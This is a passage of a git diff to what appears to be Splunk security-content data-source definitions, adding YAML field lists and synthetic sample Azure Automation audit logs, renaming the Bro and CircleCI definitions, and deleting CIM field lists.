+  "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+  "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+  "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+  "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+  "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+  "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+  "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+  "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+  "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+  "contoso.com#evilAdmin@contoso.com", "uti": "OyNAqM760kmqzxVr6jwtAA", "ver": "1.0",
+  "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+  "59e3de3b-b8c6-4360-9bc5-f094ebce6422", "description": "", "eventDataId": "b0a0bf02-57e5-4eb3-a36d-f2681d874637",
+  "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+  {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount/events/b0a0bf02-57e5-4eb3-a36d-f2681d874637/ticks/637967777618694806",
+  "level": "Informational", "resourceGroupName": "ResourceGroup1", "resourceProviderName":
+  {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+  "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount",
+  "operationId": "6a420172-1ccd-4144-ac12-3095b4019ed5", "operationName": {"value":
+  "Microsoft.Automation/automationAccounts/write", "localizedValue": "Create or Update
+  an Azure Automation account"}, "properties": {"eventCategory": "Administrative",
+  "entity": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount",
+  "message": "Microsoft.Automation/automationAccounts/write", "hierarchy": "67165197-75ea-4ca3-96a5-3e23868eacd0"},
+  "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value":
+  "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T15:09:21.8694806Z", "submissionTimestamp":
+  "2022-08-22T15:10:51.152208Z", "subscriptionId": "67165197-75ea-4ca3-96a5-3e23868eacd0"}'
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml
new file mode 100644
index 0000000000..f9054728e3
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_runbook.yml
@@ -0,0 +1,136 @@
+name: Azure Audit Create or Update an Azure Automation Runbook
+id: 2bd83221-7a8b-436f-9b2b-efa1d44d009e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+  Runbook
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- source
+- sourcetype
+- splunk_server
+- status
+- status.localizedValue
+- status.value
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/runbooks/write",
+  "scope": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourceGroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook"},
+  "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+  "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661194261",
+  "nbf": "1661194261", "exp": "1661198249", "http://schemas.microsoft.com/claims/authnclassreference":
+  "1", "aio": "AWQAm/8TAAAA3iMcbqqPPdXPATT7oalIKsh6wEFsyQ+zUVCshaLu77xsLlt067TtI11gy5hAx+z905hrX1VBehDGaedvEg2UF0BSbHVL9bJrry4zk3Xt+HNt5dTXDDgABOFuNB4QJBUW",
+  "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
+  "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+  "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+  "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+  "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+  "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+  "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+  "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+  "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+  "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+  "contoso.com#evilAdmin@contoso.com", "uti": "YMAP5fOmMkuuBUgBe-Z5AA", "ver": "1.0",
+  "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+  "49b945c0-966a-48d8-b79b-31f184544594", "description": "", "eventDataId": "303f17eb-10cb-458f-8a80-683f40f123a2",
+  "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+  {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook/events/303f17eb-10cb-458f-8a80-683f40f123a2/ticks/637967920541346086",
+  "level": "Informational", "resourceGroupName": "resourceGroup1", "resourceProviderName":
+  {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+  "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook",
+  "operationId": "b6e30ace-986c-4735-980f-926db0b43336", "operationName": {"value":
+  "Microsoft.Automation/automationAccounts/runbooks/write", "localizedValue": "Create
+  or Update an Azure Automation Runbook"}, "properties": {"eventCategory": "Administrative",
+  "entity": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook",
+  "message": "Microsoft.Automation/automationAccounts/runbooks/write", "hierarchy":
+  "1aee0e3d-b75b-440a-a927-76f0552a14e6"}, "status": {"value": "Succeeded", "localizedValue":
+  "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp":
+  "2022-08-22T19:07:34.1346086Z", "submissionTimestamp": "2022-08-22T19:08:54.1547383Z",
+  "subscriptionId": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}'
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml
new file mode 100644
index 0000000000..80bbd24828
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_webhook.yml
@@ -0,0 +1,147 @@
+name: Azure Audit Create or Update an Azure Automation webhook
+id: 575faeb2-09d0-4849-b1f6-eae241f26ff2
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+  webhook
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- httpRequest.clientIpAddress
+- httpRequest.clientRequestId
+- httpRequest.method
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- properties.serviceRequestId
+- properties.statusCode
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- result
+- result_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- status.localizedValue
+- status.value
+- subStatus.localizedValue
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/webhooks/write",
+  "scope": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook"},
+  "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+  "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661287859",
+  "nbf": "1661287859", "exp": "1661293423", "http://schemas.microsoft.com/claims/authnclassreference":
+  "1", "aio": "AWQAm/8TAAAAEendcgWjYQFuDhNNhoecwU3dpXjjenSsIvjamk77+TjLK/o1xkFGcFb1A+OVyuY+xefe0X39n8lx1iFWFqGo0GSNNKhm9OQcv/0UyXiaNIbKD7wisgQhAa9DoIyObMpO",
+  "altsecid": "1:contoso.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
+  "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+  "evilAdmin@contosol.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+  "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+  "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+  "contoso.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+  "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+  "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+  "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+  "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+  "contoso.com#evilAdmin@contoso.com", "uti": "epgtY-85CUeb6aJpaE0KAQ", "ver": "1.0",
+  "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+  "74e18a58-ee2e-40de-890d-de0c155f7086", "description": "", "eventDataId": "35b9db88-8041-413e-8dd7-f8dc243eafdd",
+  "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+  {"value": "Administrative", "localizedValue": "Administrative"}, "httpRequest":
+  {"clientRequestId": "6934b40a-c11f-4379-9ef1-c6fa3cee5015", "clientIpAddress": "190.0.0.1",
+  "method": "PUT"}, "id": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook/events/35b9db88-8041-413e-8dd7-f8dc243eafdd/ticks/637968850422707386",
+  "level": "Informational", "resourceGroupName": "eventhub_rg", "resourceProviderName":
+  {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+  "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook",
+  "operationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "operationName": {"value":
+  "Microsoft.Automation/automationAccounts/webhooks/write", "localizedValue": "Create
+  or Update an Azure Automation webhook"}, "properties": {"statusCode": "Created",
+  "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook",
+  "message": "Microsoft.Automation/automationAccounts/webhooks/write", "hierarchy":
+  "e0c00901-96b2-4151-80f7-746e24c03e98"}, "status": {"value": "Succeeded", "localizedValue":
+  "Succeeded"}, "subStatus": {"value": "Created", "localizedValue": "Created (HTTP
+  Status Code: 201)"}, "eventTimestamp": "2022-08-23T20:57:22.2707386Z", "submissionTimestamp":
+  "2022-08-23T20:58:54.2071536Z", "subscriptionId": "e0c00901-96b2-4151-80f7-746e24c03e98"}'
diff --git a/data_sources/network/Bro.yml b/data_sources/bro.yml
similarity index 59%
rename from data_sources/network/Bro.yml
rename to data_sources/bro.yml
index 4ef24f1358..100d017f03 100644
--- a/data_sources/network/Bro.yml
+++ b/data_sources/bro.yml
@@ -1,7 +1,10 @@
 name: Bro
 id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for Bro
 source: bro:http:json
 sourcetype: bro:http:json
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
diff --git a/data_sources/cim/endpoint_filesystem.yml b/data_sources/cim/endpoint_filesystem.yml
deleted file mode 100644
index e937b90e5e..0000000000
--- a/data_sources/cim/endpoint_filesystem.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-name: Endpoint.Filesystem
-prefix: Filesystem
-fields:
-  - action
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_priority
-  - dest_requires_av
-  - dest_should_timesync
-  - dest_should_update
-  - file_access_time
-  - file_create_time
-  - file_hash
-  - file_modify_time
-  - file_name
-  - file_path
-  - file_acl
-  - file_size
-  - process_guid
-  - process_id
-  - tag
-  - user
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_processes.yml b/data_sources/cim/endpoint_processes.yml
deleted file mode 100644
index 7f27e77545..0000000000
--- a/data_sources/cim/endpoint_processes.yml
+++ /dev/null
@@ -1,39 +0,0 @@
-name: Endpoint.Processes
-prefix: Processes
-fields:
-  - action
-  - cpu_load_percent
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_is_expected
-  - dest_priority
-  - dest_requires_av
-  - dest_should_timesync
-  - dest_should_update
-  - loaded_file
-  - mem_used
-  - original_file_name
-  - os
-  - parent_process
-  - parent_process_exec
-  - parent_process_id
-  - parent_process_guid
-  - parent_process_name
-  - parent_process_path
-  - process
-  - process_current_directory
-  - process_exec
-  - process_hash
-  - process_guid
-  - process_id
-  - process_integrity_level
-  - process_name
-  - process_path
-  - tag
-  - user
-  - user_id
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_registry.yml b/data_sources/cim/endpoint_registry.yml
deleted file mode 100644
index b82249d154..0000000000
--- a/data_sources/cim/endpoint_registry.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-name: Endpoint.Registry
-prefix: Registry
-fields:
-  - action
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_priority
-  - dest_requires_av
-  - dest_should_timesync
-  - dest_should_update
-  - process_guid
-  - process_id
-  - registry_hive
-  - registry_path
-  - registry_key_name
-  - registry_value_data
-  - registry_value_name
-  - registry_value_text
-  - registry_value_type
-  - status
-  - tag
-  - user
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_services.yml b/data_sources/cim/endpoint_services.yml
deleted file mode 100644
index 1bcb71d6b6..0000000000
--- a/data_sources/cim/endpoint_services.yml
+++ /dev/null
@@ -1,35 +0,0 @@
-name: Endpoint.Services
-prefix: Services
-fields:
-  - description
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_is_expected
-  - dest_priority
-  - dest_requires_av
-  - dest_should_timesync
-  - dest_should_update
-  - process_guid
-  - process_id
-  - service
-  - service_dll
-  - service_dll_path
-  - service_dll_hash
-  - service_dll_signature_exists
-  - service_dll_signature_verified
-  - service_exec
-  - service_hash
-  - service_id
-  - service_name
-  - service_path
-  - service_signature_exists
-  - service_signature_verified
-  - start_mode
-  - status
-  - tag
-  - user
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/network_resolution.yml b/data_sources/cim/network_resolution.yml
deleted file mode 100644
index 2b64524824..0000000000
--- a/data_sources/cim/network_resolution.yml
+++ /dev/null
@@ -1,32 +0,0 @@
-name: Network_Resolution.DNS
-prefix: DNS
-fields:
-  - additional_answer_count
-  - answer
-  - answer_count
-  - authority_answer_count
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_port
-  - dest_priority
-  - duration
-  - message_type
-  - name
-  - query
-  - query_count
-  - query_type
-  - record_type
-  - reply_code
-  - reply_code_id
-  - response_time
-  - src
-  - src_bunit
-  - src_category
-  - src_port
-  - src_priority
-  - tag
-  - transaction_id
-  - transport
-  - ttl
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/network_traffic.yml b/data_sources/cim/network_traffic.yml
deleted file mode 100644
index e1b040eb89..0000000000
--- a/data_sources/cim/network_traffic.yml
+++ /dev/null
@@ -1,66 +0,0 @@
-name: Network_Traffic.All_Traffic
-prefix: All_Traffic
-fields:
-  - action
-  - app
-  - bytes
-  - bytes_in
-  - bytes_out
-  - channel
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_interface
-  - dest_ip
-  - dest_mac
-  - dest_port
-  - dest_priority
-  - dest_translated_ip
-  - dest_translated_port
-  - dest_zone
-  - direction
-  - duration
-  - dvc
-  - dvc_bunit
-  - dvc_category
-  - dvc_ip
-  - dvc_mac
-  - dvc_priority
-  - dvc_zone
-  - flow_id
-  - icmp_code
-  - icmp_type
-  - packets
-  - packets_in
-  - packets_out
-  - process_id
-  - protocol
-  - protocol_version
-  - response_time
-  - rule
-  - session_id
-  - src
-  - src_bunit
-  - src_category
-  - src_interface
-  - src_ip
-  - src_mac
-  - src_port
-  - src_priority
-  - src_translated_ip
-  - src_translated_port
-  - src_zone
-  - ssid
-  - tag
-  - tcp_flag
-  - transport
-  - tos
-  - ttl
-  - user
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_account
-  - vendor_product
-  - vlan
-  - wifi
\ No newline at end of file
diff --git a/data_sources/cim/web.yml b/data_sources/cim/web.yml
deleted file mode 100644
index c279476e74..0000000000
--- a/data_sources/cim/web.yml
+++ /dev/null
@@ -1,41 +0,0 @@
-name: Web.Web
-prefix: Web
-fields:
-  - action
-  - app
-  - bytes
-  - bytes_in
-  - bytes_out
-  - cached
-  - category
-  - cookie
-  - dest
-  - dest_bunit
-  - dest_category
-  - dest_priority
-  - dest_port
-  - duration
-  - http_content_type
-  - http_method
-  - http_referrer
-  - http_referrer_domain
-  - http_user_agent
-  - http_user_agent_length
-  - response_time
-  - site
-  - src
-  - src_bunit
-  - src_category
-  - src_priority
-  - status
-  - tag
-  - uri_path
-  - uri_query
-  - url
-  - url_domain
-  - url_length
-  - user
-  - user_bunit
-  - user_category
-  - user_priority
-  - vendor_product
\ No newline at end of file
diff --git a/data_sources/cloud/CircleCI.yml b/data_sources/circleci.yml
similarity index 58%
rename from data_sources/cloud/CircleCI.yml
rename to data_sources/circleci.yml
index 73e8e6a43c..9dfcb06b20 100644
--- a/data_sources/cloud/CircleCI.yml
+++ b/data_sources/circleci.yml
@@ -1,68 +1,69 @@
 name: CircleCI
 id: 34ad06fc-a296-4ab5-8315-2f07714948e3
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for CircleCI
 source: circleci
 sourcetype: circleci
 supported_TA:
-  name: App for CircleCI
-  version: 0.1.1
+- name: App for CircleCI
   url: https://splunkbase.splunk.com/app/5162
-event_names: []
+  version: 0.1.1
 fields:
-  - _time
-  - author_name
-  - avatar_url
-  - branch
-  - build_num
-  - build_time_millis
-  - build_url
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - eventtype
-  - fail_reason
-  - host
-  - index
-  - job_name
-  - job_time
-  - linecount
-  - owners{}
-  - project_slug
-  - punct
-  - queued_time
-  - reponame
-  - source
-  - sourcetype
-  - splunk_server
-  - start_time
-  - status
-  - stop_time
-  - tag
-  - tag::eventtype
-  - timedout
-  - timeendpos
-  - timestartpos
-  - username
-  - vcs.commit_time
-  - vcs.committer_name
-  - vcs.revision
-  - vcs.subject
-  - vcs.tag
-  - vcs.type
-  - vcs.url
-  - workflows.job_id
-  - workflows.job_name
-  - workflows.upstream_job_ids{}
-  - workflows.workflow_id
-  - workflows.workflow_name
-  - workflows.workspace_id
-example_log:
-  '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
+- _time
+- author_name
+- avatar_url
+- branch
+- build_num
+- build_time_millis
+- build_url
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- eventtype
+- fail_reason
+- host
+- index
+- job_name
+- job_time
+- linecount
+- owners{}
+- project_slug
+- punct
+- queued_time
+- reponame
+- source
+- sourcetype
+- splunk_server
+- start_time
+- status
+- stop_time
+- tag
+- tag::eventtype
+- timedout
+- timeendpos
+- timestartpos
+- username
+- vcs.commit_time
+- vcs.committer_name
+- vcs.revision
+- vcs.subject
+- vcs.tag
+- vcs.type
+- vcs.url
+- workflows.job_id
+- workflows.job_name
+- workflows.upstream_job_ids{}
+- workflows.workflow_id
+- workflows.workflow_name
+- workflows.workspace_id
+example_log: '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
   "start_time": "2021-09-02T08:10:15.829Z", "queued_time": "2021-09-02T08:10:12.764Z",
   "job_name": "Unknown", "reponame": "devsecops_poc", "build_num": 94, "build_url":
   "https://circleci.com/gh/splunk/devsecops_poc/94", "branch": "main", "status": "success",
diff --git a/data_sources/cloud/AWS_CloudTrail.yml b/data_sources/cloud/AWS_CloudTrail.yml
deleted file mode 100644
index 2cac0ef0af..0000000000
--- a/data_sources/cloud/AWS_CloudTrail.yml
+++ /dev/null
@@ -1,229 +0,0 @@
-name: AWS CloudTrail
-id: aa8d90bf-8ab1-4a9f-8c1b-24a67b1cd0b0
-author: Patrick Bareiss, Splunk
-source: aws_cloudtrail
-sourcetype: aws:cloudtrail
-separator: eventName
-supported_TA:
-  name: Splunk Add-on for Amazon Web Services (AWS)
-  version: 7.4.1
-  url: https://splunkbase.splunk.com/app/1876
-event_names:
-- event_name: AWS CloudTrail
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail.yml
-- event_name: AWS CloudTrail AssumeRoleWithSAML
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
-- event_name: AWS CloudTrail ConsoleLogin
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
-- event_name: AWS CloudTrail CopyObject
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
-- event_name: AWS CloudTrail CreateAccessKey
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
-- event_name: AWS CloudTrail CreateKey
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
-- event_name: AWS CloudTrail CreateLoginProfile
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
-- event_name: AWS CloudTrail CreateNetworkAclEntry
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
-- event_name: AWS CloudTrail CreatePolicyVersion
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
-- event_name: AWS CloudTrail CreateSnapshot
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
-- event_name: AWS CloudTrail CreateTask
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
-- event_name: AWS CloudTrail CreateVirtualMFADevice
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
-- event_name: AWS CloudTrail DeactivateMFADevice
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
-- event_name: AWS CloudTrail DeleteAccountPasswordPolicy
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail DeleteAlarms
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAlarms.yml
-- event_name: AWS CloudTrail DeleteDetector
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
-- event_name: AWS CloudTrail DeleteGroup
-  data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
-- event_name: AWS CloudTrail DeleteIPSet
